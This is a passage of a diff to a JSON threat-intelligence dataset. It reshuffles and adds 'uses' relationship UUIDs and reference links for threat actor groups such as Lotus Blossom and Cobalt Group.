"estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "0259baeb-9f63-4c69-bf10-eb038c390688", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "707399d6-ab3e-4963-9315-d9d3818cd6a0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "56fca983-1cf1-4fd1-bda0-5e170a37ab59", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -785,6 +673,125 @@ ], "type": "uses" }, + { + "dest-uuid": "970cdb5c-02fb-4c38-b17e-d6327cf3c810", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "c16e5409-ee53-4d79-afdc-4099dc9292df", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "6aac77c4-eaf2-4366-8c13-ce50ab951f38", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "5a63f900-5e7e-4928-a746-dd4558e1df71", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "a93494bb-4b80-4ea1-8695-3236a49916fd", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "20138b9d-1aac-4a26-8654-a36b6bbf2bba", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "10d51417-ee35-4589-b1ff-b6df1c334e8d", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "9422fc14-1c43-410d-ab0f-a709b76c72dc", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "51dea151-0898-4a45-967c-3ebee0420484", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "f4882e23-8aa7-4b12-b28a-b349c12ee9e0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "03d7999c-1f4c-42cc-8373-e7690d318104", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "7dd95ff6-712e-4056-9626-312ea4ab4c5e", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "03342581-f790-4f03-ba41-e82e67392e23", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "a10641f4-87b4-45a3-a906-92a149cb2c27", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "f879d51c-5476-431c-aedf-f14d207e4d1e", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "72b74d71-8169-42aa-92e0-e7b04b9f5a08", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "b9f5dbe2-4c55-4fc5-af2e-d42c1d182ec4", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, { "dest-uuid": "cde2d700-9ed1-46cf-9bce-07364fe8b24f", "tags": [ @@ -803,10 +810,12 @@ "refs": [ "https://attack.mitre.org/groups/G0030", "https://www.paloaltonetworks.com/resources/research/unit42-operation-lotus-blossom.html", + "https://www.accenture.com/t20180127T003755Z_w_/us-en/_acnmedia/PDF-46/Accenture-Security-Dragonfish-Threat-Analysis.pdf", "https://securelist.com/the-spring-dragon-apt/70726/" ], "synonyms": [ "Lotus Blossom", + "DRAGONFISH", "Spring Dragon" ] }, @@ -868,49 +877,7 @@ "type": "uses" }, { - "dest-uuid": "0259baeb-9f63-4c69-bf10-eb038c390688", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "f4882e23-8aa7-4b12-b28a-b349c12ee9e0", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "ca1a3f50-5ebd-41f8-8320-2c7d6a6e88be", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "35dd844a-b219-4e2b-a6bb-efa9a75995a9", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "d54416bd-0803-41ca-870a-ce1af7c05638", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "d742a578-d70e-4d0e-96a6-02a9c30204e6", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "b07c2c47-fefb-4d7c-a69e-6a3296171f54", + "dest-uuid": "b9f5dbe2-4c55-4fc5-af2e-d42c1d182ec4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -923,34 +890,6 @@ ], "type": "uses" }, - { - "dest-uuid": "3b3cbbe0-6ed3-4334-b543-3ddfd8c5642d", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "7fd87010-3a00-4da3-b905-410525e8ec44", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "a257ed11-ff3b-4216-8c9d-3938ef57064c", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "7bc57495-ea59-4380-be31-a64af124ef18", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "8c32eb4d-805f-4fc5-bf60-c4d476c131b5", "tags": [ @@ -959,49 +898,7 @@ "type": "uses" }, { - "dest-uuid": "242f3da3-4425-4d11-8f5c-b842886da966", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "355be19c-ffc9-46d5-8d50-d6a036c675b6", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "b9f5dbe2-4c55-4fc5-af2e-d42c1d182ec4", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "72b74d71-8169-42aa-92e0-e7b04b9f5a08", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "3c4a2599-71ee-4405-ba1e-0e28414b4bc5", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "830c9528-df21-472c-8c14-a036bf17d665", + "dest-uuid": "ca1a3f50-5ebd-41f8-8320-2c7d6a6e88be", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -1015,35 +912,14 @@ "type": "uses" }, { - "dest-uuid": "0c8465c0-d0b4-4670-992e-4eee8d7ff952", + "dest-uuid": "242f3da3-4425-4d11-8f5c-b842886da966", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "4b74a1d4-b0e9-4ef1-93f1-14ecc6e2f5b5", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "cc7b8c4e-9be0-47ca-b0bb-83915ec3ee2f", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "3ccef7ae-cb5e-48f6-8302-897105fbf55c", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "e358d692-23c0-4a31-9eb6-ecc13a8d7735", + "dest-uuid": "35dd844a-b219-4e2b-a6bb-efa9a75995a9", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -1057,35 +933,35 @@ "type": "uses" }, { - "dest-uuid": "56fca983-1cf1-4fd1-bda0-5e170a37ab59", + "dest-uuid": "830c9528-df21-472c-8c14-a036bf17d665", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "be2dcee9-a7a7-4e38-afd6-21b31ecc3d63", + "dest-uuid": "7bc57495-ea59-4380-be31-a64af124ef18", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "03342581-f790-4f03-ba41-e82e67392e23", + "dest-uuid": "0259baeb-9f63-4c69-bf10-eb038c390688", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", + "dest-uuid": "355be19c-ffc9-46d5-8d50-d6a036c675b6", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "519630c5-f03f-4882-825c-3af924935817", + "dest-uuid": "d742a578-d70e-4d0e-96a6-02a9c30204e6", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -1098,6 +974,62 @@ ], "type": "uses" }, + { + "dest-uuid": "3ccef7ae-cb5e-48f6-8302-897105fbf55c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "72b74d71-8169-42aa-92e0-e7b04b9f5a08", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "4b74a1d4-b0e9-4ef1-93f1-14ecc6e2f5b5", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "b07c2c47-fefb-4d7c-a69e-6a3296171f54", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "56fca983-1cf1-4fd1-bda0-5e170a37ab59", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "afc079f3-c0ea-4096-b75d-3f05338b7f60", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "e358d692-23c0-4a31-9eb6-ecc13a8d7735", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "3c4a2599-71ee-4405-ba1e-0e28414b4bc5", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, { "dest-uuid": "f3c544dc-673c-4ef3-accb-53229f1ae077", "tags": [ @@ -1106,7 +1038,56 @@ "type": "uses" }, { - "dest-uuid": "ae676644-d2d2-41b7-af7e-9bed1b55898c", + "dest-uuid": "7fd87010-3a00-4da3-b905-410525e8ec44", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "be2dcee9-a7a7-4e38-afd6-21b31ecc3d63", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "3b3cbbe0-6ed3-4334-b543-3ddfd8c5642d", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "d54416bd-0803-41ca-870a-ce1af7c05638", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "519630c5-f03f-4882-825c-3af924935817", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "a257ed11-ff3b-4216-8c9d-3938ef57064c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "0c8465c0-d0b4-4670-992e-4eee8d7ff952", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -1120,7 +1101,35 @@ "type": "uses" }, { - "dest-uuid": "afc079f3-c0ea-4096-b75d-3f05338b7f60", + "dest-uuid": "03342581-f790-4f03-ba41-e82e67392e23", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "cc7b8c4e-9be0-47ca-b0bb-83915ec3ee2f", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "ae676644-d2d2-41b7-af7e-9bed1b55898c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "f4882e23-8aa7-4b12-b28a-b349c12ee9e0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -1150,41 +1159,6 @@ ] }, "related": [ - { - "dest-uuid": "3c4a2599-71ee-4405-ba1e-0e28414b4bc5", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "9422fc14-1c43-410d-ab0f-a709b76c72dc", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "a5528622-3a8a-4633-86ce-8cdaf8423858", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "6ff403bc-93e3-48be-8687-e102fdba8c88", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "7bc57495-ea59-4380-be31-a64af124ef18", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "7fd87010-3a00-4da3-b905-410525e8ec44", "tags": [ @@ -1192,13 +1166,6 @@ ], "type": "uses" }, - { - "dest-uuid": "d742a578-d70e-4d0e-96a6-02a9c30204e6", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "8c32eb4d-805f-4fc5-bf60-c4d476c131b5", "tags": [ @@ -1207,14 +1174,14 @@ "type": "uses" }, { - "dest-uuid": "835a79f1-842d-472d-b8f4-d54b545c341b", + "dest-uuid": "a5528622-3a8a-4633-86ce-8cdaf8423858", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", + "dest-uuid": "835a79f1-842d-472d-b8f4-d54b545c341b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -1227,6 +1194,27 @@ ], "type": "uses" }, + { + "dest-uuid": "3c4a2599-71ee-4405-ba1e-0e28414b4bc5", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "7bc57495-ea59-4380-be31-a64af124ef18", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "d742a578-d70e-4d0e-96a6-02a9c30204e6", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, { "dest-uuid": "d21a2069-23d5-4043-ad6d-64f6b644cb1a", "tags": [ @@ -1234,6 +1222,20 @@ ], "type": "uses" }, + { + "dest-uuid": "a5e91d50-24fa-44ec-9894-39a88f658cea", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "9422fc14-1c43-410d-ab0f-a709b76c72dc", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, { "dest-uuid": "0259baeb-9f63-4c69-bf10-eb038c390688", "tags": [ @@ -1241,6 +1243,13 @@ ], "type": "uses" }, + { + "dest-uuid": "6ff403bc-93e3-48be-8687-e102fdba8c88", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, { "dest-uuid": "355be19c-ffc9-46d5-8d50-d6a036c675b6", "tags": [ @@ -1249,7 +1258,7 @@ "type": "uses" }, { - "dest-uuid": "a5e91d50-24fa-44ec-9894-39a88f658cea", + "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -1272,8 +1281,9 @@ "https://www.proofpoint.com/us/threat-insight/post/microsoft-word-intruder-integrates-cve-2017-0199-utilized-cobalt-group-target", "https://www.riskiq.com/blog/labs/cobalt-strike/", "https://www.riskiq.com/blog/labs/cobalt-group-spear-phishing-russian-banks/", + "https://www.europol.europa.eu/newsroom/news/mastermind-behind-eur-1-billion-cyber-bank-robbery-arrested-in-spain", "https://crowdstrike.lookbookhq.com/global-threat-report-2018-web/cs-2018-global-threat-report", - "https://www.europol.europa.eu/newsroom/news/mastermind-behind-eur-1-billion-cyber-bank-robbery-arrested-in-spain" + "https://blog.morphisec.com/cobalt-gang-2.0" ], "synonyms": [ "Cobalt Group", @@ -1283,42 +1293,7 @@ }, "related": [ { - "dest-uuid": "8c32eb4d-805f-4fc5-bf60-c4d476c131b5", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "f4882e23-8aa7-4b12-b28a-b349c12ee9e0", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "68f7e3a1-f09f-4164-9a62-16b648a0dd5a", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "9422fc14-1c43-410d-ab0f-a709b76c72dc", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "43e7dc91-05b2-474c-b9ac-2ed4fe101f4d", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "afc079f3-c0ea-4096-b75d-3f05338b7f60", + "dest-uuid": "51dea151-0898-4a45-967c-3ebee0420484", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -1331,69 +1306,6 @@ ], "type": "uses" }, - { - "dest-uuid": "355be19c-ffc9-46d5-8d50-d6a036c675b6", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "20138b9d-1aac-4a26-8654-a36b6bbf2bba", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "478aa214-2ca7-4ec0-9978-18798e514790", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "51dea151-0898-4a45-967c-3ebee0420484", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "ff6caf67-ea1f-4895-b80e-4bb0fc31c6db", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "56fca983-1cf1-4fd1-bda0-5e170a37ab59", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "e3a12395-188d-4051-9a16-ea8e14d07b88", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "7fd87010-3a00-4da3-b905-410525e8ec44", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "b21c3b2d-02e6-45b1-980b-e69051040839", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "6aabc5ec-eae6-422c-8311-38d45ee9838a", "tags": [ @@ -1402,28 +1314,7 @@ "type": "uses" }, { - "dest-uuid": "d8d19e33-94fd-4aa3-b94a-08ee801a2153", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "ebbe170d-aa74-4946-8511-9921243415a3", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "4061e78c-1284-44b4-9116-73e4ac3912f7", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "edbe24e9-aec4-4994-ac75-6a6bc7f1ddd0", + "dest-uuid": "355be19c-ffc9-46d5-8d50-d6a036c675b6", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -1437,7 +1328,28 @@ "type": "uses" }, { - "dest-uuid": "4b74a1d4-b0e9-4ef1-93f1-14ecc6e2f5b5", + "dest-uuid": "8c32eb4d-805f-4fc5-bf60-c4d476c131b5", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "20138b9d-1aac-4a26-8654-a36b6bbf2bba", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "e3a12395-188d-4051-9a16-ea8e14d07b88", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "478aa214-2ca7-4ec0-9978-18798e514790", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -1450,27 +1362,6 @@ ], "type": "uses" }, - { - "dest-uuid": "6aac77c4-eaf2-4366-8c13-ce50ab951f38", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "be2dcee9-a7a7-4e38-afd6-21b31ecc3d63", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", "tags": [ @@ -1485,12 +1376,159 @@ ], "type": "uses" }, + { + "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "ff6caf67-ea1f-4895-b80e-4bb0fc31c6db", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "b21c3b2d-02e6-45b1-980b-e69051040839", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "6aac77c4-eaf2-4366-8c13-ce50ab951f38", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "d8d19e33-94fd-4aa3-b94a-08ee801a2153", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "43e7dc91-05b2-474c-b9ac-2ed4fe101f4d", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "68f7e3a1-f09f-4164-9a62-16b648a0dd5a", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "56fca983-1cf1-4fd1-bda0-5e170a37ab59", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "edbe24e9-aec4-4994-ac75-6a6bc7f1ddd0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "4061e78c-1284-44b4-9116-73e4ac3912f7", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "9422fc14-1c43-410d-ab0f-a709b76c72dc", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "be2dcee9-a7a7-4e38-afd6-21b31ecc3d63", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "03259939-0b57-482f-8eb5-87c0e0d54334", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "4b74a1d4-b0e9-4ef1-93f1-14ecc6e2f5b5", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "241814ae-de3f-4656-b49e-f9a80764d4b7", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "7fd87010-3a00-4da3-b905-410525e8ec44", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "ebbe170d-aa74-4946-8511-9921243415a3", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "f4882e23-8aa7-4b12-b28a-b349c12ee9e0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "afc079f3-c0ea-4096-b75d-3f05338b7f60", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, { "dest-uuid": "aafea02e-ece5-4bb2-91a6-3bf8c7f38a39", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" + }, + { + "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" } ], "uuid": "dc6fe6ee-04c2-49be-ba3d-f38d2463c02a", @@ -1503,8 +1541,8 @@ "refs": [ "https://attack.mitre.org/groups/G0009", "https://blog.crowdstrike.com/deep-thought-chinese-targeting-national-security-think-tanks/", - "https://www.emc.com/collateral/white-papers/h12756-wp-shell-crew.pdf", "https://www.threatconnect.com/the-anthem-hack-all-roads-lead-to-china/", + "https://www.emc.com/collateral/white-papers/h12756-wp-shell-crew.pdf", "http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/the-black-vine-cyberespionage-group.pdf", "https://icitech.org/icit-brief-chinas-espionage-dynasty-economic-death-by-a-thousand-cuts/" ], @@ -1547,21 +1585,7 @@ "type": "uses" }, { - "dest-uuid": "01a5a209-b94c-450b-b7f9-946497d91055", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "00d0b012-8a03-410e-95de-5826bf542de6", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "2e45723a-31da-4a7e-aaa6-e01998a6788f", + "dest-uuid": "68f7e3a1-f09f-4164-9a62-16b648a0dd5a", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -1575,14 +1599,7 @@ "type": "uses" }, { - "dest-uuid": "c16e5409-ee53-4d79-afdc-4099dc9292df", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "68f7e3a1-f09f-4164-9a62-16b648a0dd5a", + "dest-uuid": "01a5a209-b94c-450b-b7f9-946497d91055", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -1596,21 +1613,7 @@ "type": "uses" }, { - "dest-uuid": "8f4a33ec-8b1f-4b80-a2f6-642b2e479580", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "e358d692-23c0-4a31-9eb6-ecc13a8d7735", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "94379dec-5c87-49db-b36e-66abc0b81344", + "dest-uuid": "00d0b012-8a03-410e-95de-5826bf542de6", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -1624,14 +1627,14 @@ "type": "uses" }, { - "dest-uuid": "9b99b83a-1aac-4e29-b975-b374950551a3", + "dest-uuid": "2e45723a-31da-4a7e-aaa6-e01998a6788f", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "fbb470da-1d44-4f29-bbb3-9efbe20f94a3", + "dest-uuid": "e358d692-23c0-4a31-9eb6-ecc13a8d7735", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -1657,6 +1660,41 @@ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" + }, + { + "dest-uuid": "8f4a33ec-8b1f-4b80-a2f6-642b2e479580", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + 